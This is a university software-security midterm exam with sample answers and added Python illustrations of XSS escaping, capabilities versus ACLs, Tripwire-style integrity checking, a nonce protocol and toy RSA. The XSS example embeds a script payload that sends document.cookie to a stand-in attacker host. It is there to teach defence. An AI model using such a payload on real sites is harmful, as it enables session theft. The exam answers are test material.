mid-term - University of Virginia

Name____________________
Mid Term Exam – Software Security
1. (10 points) Describe in detail one attack. Precisely how would it be launched? What has
to be true for it to succeed? Can the attacked entities defend themselves? How does the
attacker define success?
1) Most common answers: Distributed Denial of Service, Worm, Virus, Buffer Overflow.
2) Remote buffer overflow attack: it is launched by sending a specially constructed
buffer to a network application that does not check the length of the incoming data. The
buffer is long enough to overwrite the saved return address on the process stack, i.e. the
address at which execution resumes when the current procedure returns. The new return
address points back into the buffer the attacker sent, which contains machine-code
instructions. Success is defined by the execution of the code in the buffer. The attacked
entities can defend themselves by patching the insecure software (and, at development
time, by bounds-checking every copy into a fixed-size buffer).
3) Cross-site scripting: it allows a malicious user to cause arbitrary script to run during
another user's web session. The script runs in the victim's browser with whatever that
browser permits the vulnerable web site to do (e.g. reading the site's cookies or issuing
requests in the user's name). The attack is typically triggered when the user clicks on a
hyperlink supplied by the attacker. For the attack to succeed, the program must have failed
to examine user input to make sure it is valid before echoing it into a page. This results from
coding mistakes in web applications. To protect themselves, web sites should review their
code and make sure it properly filters and escapes user-supplied data before placing it in a page.
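As an added illustration of the reflected cross-site scripting case described above (example code written for this page, not part of the original exam), the block below builds the kind of attacker-supplied link the answer refers to, extracts the search parameter the way a server would, and renders it twice: once without any filtering and once with HTML escaping. The URL, host names and payloads are constructed for the example. html.escape is the right fix for the HTML body and quoted-attribute contexts shown here; data placed inside a script block or a URL needs a different encoding.

```python
import html
from urllib.parse import parse_qs, urlencode, urlparse

# Constructed for this example: the link an attacker would get a victim to click.
PAYLOAD = "<script>new Image().src='https://evil.example/?c='+document.cookie</script>"
ATTACK_URL = "https://shop.example/search?" + urlencode({"q": PAYLOAD})
# A second constructed payload aimed at the attribute context rather than the body.
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.domain)'


def query_param(url, name):
    """What the server sees after decoding the query string of the clicked link."""
    return parse_qs(urlparse(url).query).get(name, [""])[0]


def render_vulnerable(q):
    """Echoes the search term straight into the page: the coding mistake in the answer."""
    return f'<h1>Results for {q}</h1>\n<input name="q" value="{q}">'


def render_hardened(q):
    """Same page, but the term is HTML-escaped (<, >, &, ", ') so it is shown as text.
    Correct for the body and quoted-attribute contexts used here; a JavaScript or URL
    context would need its own encoding."""
    safe = html.escape(q, quote=True)
    return f'<h1>Results for {safe}</h1>\n<input name="q" value="{safe}">'


def contains_script_tag(page):
    return "<script" in page.lower()


def demo():
    q = query_param(ATTACK_URL, "q")
    return {
        "vulnerable": render_vulnerable(q),
        "hardened": render_hardened(q),
        "vulnerable_attr": render_vulnerable(ATTR_PAYLOAD),
        "hardened_attr": render_hardened(ATTR_PAYLOAD),
    }
```

Running demo() shows the body payload surviving as a live script tag in the vulnerable page and as literal text in the hardened one, and the attribute payload closing the value attribute only in the vulnerable rendering.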
2. (9 points) What is the difference between using capabilities and access control lists to
access protected objects along the following dimensions?
a. (cost of) storage consumed
Capabilities are stored per subject: each subject holds one entry for every object it may
use, so the total grows with the number of (subject, object) pairs actually granted and the
rights in each. An ACL is stored per object and lists every subject with rights to it, so its
size depends on the numbers of users and objects in the system. Since most subjects can
reach only a few objects, capabilities should generally consume less storage than access
control lists.
b. execution performance
For an ACL, a check is a table lookup of the requesting subject in the object's list. For a
capability, the cost depends on how capabilities are represented: when the kernel holds each
process's capability list, a check may involve traversing that list, is likely to involve a trap
to the kernel, and has to be done for every process that presents the capability. Under that
representation the access control list works faster than capabilities.
c. granularity of protection – that is, how finely can you divide objects and protect one
differently from another?
Capabilities have the finer granularity. They can be granted per process, processes can pass
them along to other processes, and each capability names specific rights on a specific
object. It is possible to make an access control list very fine-grained as well; however, the
table then grows quickly and may become too big.
Mid Term Exam   1   02/16/16
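To make the three dimensions above concrete, here is an added toy model of both mechanisms (example code written for this page, not from the exam). The ACL is a per-object table consulted by subject identity; the capability is a per-subject token whose integrity is protected by a secret held by the issuing kernel, so the holder can present it without being identified and can obtain an attenuated copy to hand to another process. The object names, subjects and the HMAC token format are assumptions made for the illustration; a kernel-held capability list would be checked differently, as the answer to 2b notes.

```python
import hashlib, hmac, os


class AclStore:
    """Access control lists: one list per object, consulted by subject identity."""
    def __init__(self):
        self.acl = {}                                  # object -> {subject: set(rights)}

    def grant(self, obj, subject, rights):
        self.acl.setdefault(obj, {}).setdefault(subject, set()).update(rights)

    def check(self, obj, subject, right):
        # The monitor must first know WHO is asking, then look the subject up in the list.
        return right in self.acl.get(obj, {}).get(subject, set())


class CapabilityIssuer:
    """Capabilities: unforgeable tokens naming (object, rights), held by subjects.
    Represented here as HMAC-protected strings (a 'sparse' capability) rather than a
    kernel-held C-list, so checking one is a tag verification, not a list traversal."""
    def __init__(self):
        self.key = os.urandom(32)                      # secret of the trusted kernel/issuer

    def mint(self, obj, rights):
        body = f"{obj}|{','.join(sorted(rights))}".encode()   # assumes names contain no '|'
        return body + b"|" + hmac.new(self.key, body, hashlib.sha256).hexdigest().encode()

    def check(self, cap, obj, right):
        # No subject identity is needed: whoever presents a valid token holds its rights.
        body, _, tag = cap.rpartition(b"|")
        expected = hmac.new(self.key, body, hashlib.sha256).hexdigest().encode()
        if not hmac.compare_digest(tag, expected):
            return False                               # forged or tampered token
        cobj, _, rights = body.decode().partition("|")
        return cobj == obj and right in rights.split(",")

    def attenuate(self, cap, keep):
        """Delegation: a holder obtains a weaker copy (subset of rights) to pass to another
        process. This per-process, per-right granting is the granularity point in 2c."""
        body, _, _ = cap.rpartition(b"|")
        obj, _, rights = body.decode().partition("|")
        have = set(rights.split(","))
        if not all(self.check(cap, obj, r) for r in have):
            raise ValueError("not a valid capability")
        return self.mint(obj, have & set(keep))


def demo():
    log = "/var/log/auth.log"                          # constructed object names
    acl = AclStore()
    acl.grant("/etc/shadow", "root", {"read", "write"})
    acl.grant(log, "root", {"read", "write"})
    acl.grant(log, "logwatch", {"read"})

    issuer = CapabilityIssuer()
    cap_rw = issuer.mint(log, {"read", "write"})       # held by process A
    cap_r = issuer.attenuate(cap_rw, {"read"})          # A hands B a read-only copy
    forged = cap_r.replace(b"|read|", b"|read,write|")  # B tries to add a right by editing the token
    return {
        "acl_root_read": acl.check(log, "root", "read"),
        "acl_logwatch_write": acl.check(log, "logwatch", "write"),
        "cap_delegated_read": issuer.check(cap_r, log, "read"),
        "cap_delegated_write": issuer.check(cap_r, log, "write"),
        "cap_forged": issuer.check(forged, log, "write"),
        "cap_wrong_object": issuer.check(cap_rw, "/etc/shadow", "read"),
    }
```

The ACL side needs the subject's name at every check; the capability side needs only the token, which is why it can be handed from process to process and narrowed on the way, while any edit to the token fails the tag check.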
3. (20 points) You are the system administrator for the University of Virginia web and
compute servers. You are using Tripwire, USTAT, and GRID to protect your systems.
For each intrusion detection system, describe an attack that will (likely) be detected.
Tripwire:
Any attack that modifies monitored files on the protected system (contents, permission bits
or ownership). Tripwire compares each file against a stored baseline of checksums and
attributes, so a replaced system binary or an edited configuration file shows up at the next
check.
USTAT:
Any attack that has a distinct set of steps, since USTAT matches the audit trail against
state-transition descriptions of known penetration scenarios.
GRID:
Any attack that touches a large number of machines and therefore produces a recognizable
pattern of network activity, e.g. a worm.
List two attacks (or kinds of attacks) that will not be caught by these security systems.
1. Denial of service attack (nothing on disk changes, and the traffic need not follow a
scripted sequence of steps).
2. Buffer overflow (the exploit can stay entirely in memory and modify no file).
3. Off-line attacks, such as manipulation of components outside the system's execution.
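As an added example (written for this page, not part of the exam or of Tripwire itself), the block below implements the core of a Tripwire-style integrity check: snapshot a tree of files, let a constructed intrusion replace a binary with one of the same size, append a backdoor account and drop a hidden file, then diff the two snapshots. It also shows why the uncaught attacks listed above slip through: a denial of service or an in-memory buffer overflow leaves the snapshot unchanged. Paths and file contents are constructed for the example.

```python
import hashlib, stat, tempfile
from pathlib import Path


def snapshot(root):
    """Baseline: sha256, permission bits and size of every regular file under root.
    Real Tripwire also records owner, inode and timestamps, and keeps this database
    where the intruder cannot rewrite it (read-only media or a remote host); a baseline
    left on the monitored host can simply be regenerated after the break-in."""
    root = Path(root)
    db = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and not p.is_symlink():
            st = p.lstat()
            db[p.relative_to(root).as_posix()] = {
                "sha256": hashlib.sha256(p.read_bytes()).hexdigest(),
                "mode": stat.S_IMODE(st.st_mode),
                "size": st.st_size,
            }
    return db


def compare(baseline, current):
    """Report added, removed and changed files between two snapshots."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "changed": sorted(k for k in baseline.keys() & current.keys()
                          if baseline[k] != current[k]),
    }


def demo(root=None):
    """Constructed scenario: trojaned login binary (same size, new contents), a backdoor
    account appended to passwd, and a dropped rootkit loader. All three touch the file
    system, so the integrity check sees them; a DoS or memory-only exploit would not appear."""
    root = Path(root) if root else Path(tempfile.mkdtemp())
    (root / "bin").mkdir(parents=True, exist_ok=True)
    (root / "etc").mkdir(exist_ok=True)
    (root / "bin" / "login").write_bytes(b"\x7fELF original login program\n")
    (root / "etc" / "passwd").write_text("root:x:0:0:root:/root:/bin/sh\n")
    baseline = snapshot(root)

    (root / "bin" / "login").write_bytes(b"\x7fELF trojaned login program\n")
    with open(root / "etc" / "passwd", "a") as f:
        f.write("toor:x:0:0::/:/bin/sh\n")
    (root / "tmp").mkdir(exist_ok=True)
    (root / "tmp" / ".rk").write_bytes(b"rootkit loader")
    return compare(baseline, snapshot(root))
```

The replaced login binary has the same length as the original, so a size-only check would miss it; the content hash does not.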
4. (8 points) Define
a. covert channel
A path used to transfer information in a way not intended by system designers.
b. trap door
1) A hidden piece of code that responds to a special input, allowing its user access to
resources without passing through the normal security enforcement mechanism.
2) A trapdoor one-way function is a one-way function with a secret trapdoor: it is easy to
compute in one direction and hard to invert, but anyone who knows the secret can easily
compute the inverse as well.
Name____________________
5. (18 points) Consider the following cryptographic message exchange protocol (using the
notation from the Abadi & Needham and Burrows et al. papers):
Message 1 Y → X: Y
Message 2 X → Y: Nx
Message 3 Y → X: { Nx } Kys
Message 4 X → S: Y, X, { Nx } Kys
Message 5 S → X: { Y, Nx } Kxs
a. What are X, Y and S?
The letter K denotes a key. What is the purpose of each key?
b. Kys
c. Kxs
d. Describe what each message in the protocol accomplishes. Be sure to explain what part
Nx plays.
Msg 1:
Msg 2:
Msg 3:
Msg 4:
Msg 5:
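Below is an added simulation of the five messages (example code written for this page; it is not part of the exam and is not a model answer to parts a to d). It assumes what the key subscripts suggest: S holds a long-term key Kys with Y and Kxs with X, and Nx is a random nonce X generates for this run. The encryption {M}K is modelled with a toy encrypt-then-MAC construction built from the standard library so that the example runs offline. Two dishonest responders are included: one replaying a {Nx}Kys captured from an earlier run, and one who holds his own key Kzs with S but announces himself as Y.

```python
import hashlib, hmac, os, secrets

# Toy symmetric {M}K: SHA-256 counter-mode keystream plus an HMAC tag (encrypt-then-MAC).
# Confidential and tamper-evident enough to model the protocol; use a real AEAD
# (e.g. AES-GCM) for anything that is not a classroom simulation.
def _stream(key, iv, n):
    return b"".join(hashlib.sha256(key + iv + i.to_bytes(4, "big")).digest()
                    for i in range((n + 31) // 32))[:n]

def enc(key, msg):
    iv = os.urandom(16)
    ct = bytes(a ^ b for a, b in zip(msg, _stream(key, iv, len(msg))))
    return iv + ct + hmac.new(key, iv + ct, hashlib.sha256).digest()

def dec(key, blob):
    iv, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, iv + ct, hashlib.sha256).digest()):
        raise ValueError("wrong key or tampered ciphertext")
    return bytes(a ^ b for a, b in zip(ct, _stream(key, iv, len(ct))))


class Server:
    """S: shares one long-term key K_ps with every principal p."""
    def __init__(self, keys): self.keys = keys
    def handle_msg4(self, y, x, blob):
        nx = dec(self.keys[y], blob)                       # Message 4: Y, X, {Nx}Kys
        return enc(self.keys[x], y.encode() + b"|" + nx)   # Message 5: {Y, Nx}Kxs


class Principal:
    def __init__(self, name, k_s): self.name, self.k_s = name, k_s
    def msg1(self): return self.name                                  # Y -> X: Y
    def msg2(self): self.nx = secrets.token_bytes(16); return self.nx  # X -> Y: Nx (fresh)
    def msg3(self, nx): return enc(self.k_s, nx)                      # Y -> X: {Nx}Kys
    def msg4(self, y, blob): return (y, self.name, blob)              # X -> S: Y, X, {Nx}Kys
    def check_msg5(self, y, blob):
        y_claim, _, nx = dec(self.k_s, blob).partition(b"|")
        # X accepts only if S names Y and echoes the nonce X chose in THIS run.
        return y_claim == y.encode() and hmac.compare_digest(nx, self.nx)


class Replayer(Principal):
    """Attacker claiming to be Y who re-sends a {Nx}Kys captured in an earlier run."""
    def __init__(self, captured): self.captured = captured
    def msg1(self): return "Y"
    def msg3(self, nx): return self.captured


class Impostor(Principal):
    """Attacker Z who legitimately shares Kzs with S but announces himself as Y."""
    def msg1(self): return "Y"


def run(x, responder, s):
    y = responder.msg1()
    nx = x.msg2()
    m4 = x.msg4(y, responder.msg3(nx))
    try:
        return x.check_msg5(y, s.handle_msg4(*m4))
    except ValueError:
        return False     # S could not decrypt message 3 under the claimed principal's key


def demo():
    kxs, kys, kzs = os.urandom(32), os.urandom(32), os.urandom(32)   # pre-distributed keys
    s = Server({"X": kxs, "Y": kys, "Z": kzs})
    x, y = Principal("X", kxs), Principal("Y", kys)
    captured = y.msg3(secrets.token_bytes(16))   # {Nx'}Kys recorded from an earlier run
    return {
        "honest": run(x, y, s),
        "replay": run(x, Replayer(captured), s),
        "impostor": run(x, Impostor("Z", kzs), s),
    }
```

In the replay run S happily returns {Y, Nx'}Kxs, but X rejects it because Nx' is not the nonce X issued in message 2; in the impostor run S cannot decrypt the blob under Kys at all.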
6. (15 points) Contrast the kind of mathematical computation that must be performed to
encrypt a message using the Data Encryption Standard (DES) versus the RSA (Rivest,
Shamir, Adleman) public-key method.
a. What mathematical operations are performed in each?
DES:
RSA:
b. Are they of roughly equivalent (execution) cost? Why or why not?
c. Does either computation vary with the key value?
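For the RSA side of this question, and for the trapdoor one-way function defined in question 4b, the block below (an added example written for this page, not from the exam) carries out textbook RSA with the small primes 61 and 53: key setup, encryption and decryption by modular exponentiation, a square-and-multiply routine that counts its multiplications, and recovery of the private exponent from the factors of n. The primes, exponent and message are chosen for illustration. DES is not modelled here; its operations are fixed bit permutations, XORs with round subkeys and S-box table lookups, repeated for 16 rounds whatever the key.

```python
import math


def modpow_counted(base, exp, mod):
    """Left-to-right square-and-multiply. Returns (base**exp mod mod, multiplications).
    Every exponent bit costs a squaring; every 1 bit costs an extra multiply, so the
    work depends on the exponent's value, not just its length."""
    result, mults = 1, 0
    for bit in bin(exp)[2:]:
        result = (result * result) % mod
        mults += 1
        if bit == "1":
            result = (result * base) % mod
            mults += 1
    return result, mults


def rsa_keypair(p, q, e=17):
    """Textbook RSA from two primes (toy sizes; real keys use primes of ~1024 bits)."""
    n, phi = p * q, (p - 1) * (q - 1)
    if math.gcd(e, phi) != 1:
        raise ValueError("e must be coprime to (p-1)(q-1)")
    d = pow(e, -1, phi)          # private exponent: the trapdoor, computable from p and q
    return (n, e), (n, d)


def rsa_encrypt(pub, m):
    n, e = pub
    return pow(m, e, n)          # one modular exponentiation per block


def rsa_decrypt(priv, c):
    n, d = priv
    return pow(c, d, n)


def break_trapdoor(n, e):
    """The hard direction of m -> m^e mod n is inverting it without d. Whoever can factor
    n gets phi(n) and hence d. Trial division succeeds only because n is tiny here; for a
    2048-bit n this step is what is believed infeasible."""
    for p in range(2, math.isqrt(n) + 1):
        if n % p == 0:
            q = n // p
            return pow(e, -1, (p - 1) * (q - 1))
    raise ValueError("n has no small factor")


def demo():
    pub, priv = rsa_keypair(61, 53, 17)        # n = 3233, d = 2753
    c = rsa_encrypt(pub, 65)                    # 65^17 mod 3233 = 2790
    return {
        "roundtrip": rsa_decrypt(priv, c) == 65,
        "recovered_d": break_trapdoor(*pub) == priv[1],
        # same 8-bit exponent length, different work: 129 = 0b10000001, 255 = 0b11111111
        "mults_129": modpow_counted(65, 129, pub[0])[1],
        "mults_255": modpow_counted(65, 255, pub[0])[1],
    }
```

The two multiplication counts in demo() differ although both exponents are eight bits long, which is the point behind part c: RSA's cost varies with the key value, whereas a DES encryption performs the same fixed sequence of operations for every key.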
Pledge: On my honor, I have neither given, nor received unauthorized aid on this exam.
Sign your name: ________________________
There is one more exam question. You may complete it in class, or
take it home and complete it under the honor system. See next page.
Name____________________
CS 551/651 Software Security -- Last Mid Term Exam question.
Please turn in to Anita Jones at the latest by noon Tuesday, March 8, 2000 – electronically
or on paper. Complete this question under the honor system.
7. (20 points) Your startup company is going to solve the problem of consumers who do
not trust using their credit cards on the Internet. You are launching a new service called
cueCard. A client pays for the card at a variety of retail stores such as convenience stores
(like 7-eleven), merchandise stores (like WalMart), and the Post Office. The card has a
unique identification number and an authorization number. To purchase goods on the Internet
with a cueCard, one types in the number and the code.
There are several reasons why the client should prefer the cueCard to credit cards:
* cueCard does not involve a standing account that is integrally related to the owner
* cueCard buyer is anonymous (like someone who pays in cash)
* cueCard has limited value (that might be stolen)
* cueCard can be given to another simply by transferring two numbers
The cueCard Intl. company expects to replace money orders and to provide this new
financial transaction to complement what already exists in the form of bank
accounts/checks and credit cards. Think of the cueCard as an electronic money order.
Now consider the transactions involved between the client (the purchaser), the merchant,
and cueCard Intl. (they are essentially a bank holding the client’s funds).
Sketch the transactions (the messages that are sent) between the three parties when a
purchase is made.
(Don’t complicate the problem: assume
* that the cueCard has enough funds remaining on it to make the purchase at hand, &
* any cryptographic keys that are needed have been distributed.)
Use the message exchange format illustrated in question 5 of this exam.
Let
M represent the merchant
B represent the buyer – i.e. the client using their cueCard to make the purchase
C represent cueCard International
Specify what keys pre-exist. Make clear whether each key is symmetric or asymmetric.
Show the content of each message and what is encrypted. Do you use nonces?
Pledge: On my honor, I have neither given, nor received unauthorized aid on this exam.
Sign your name: ________________________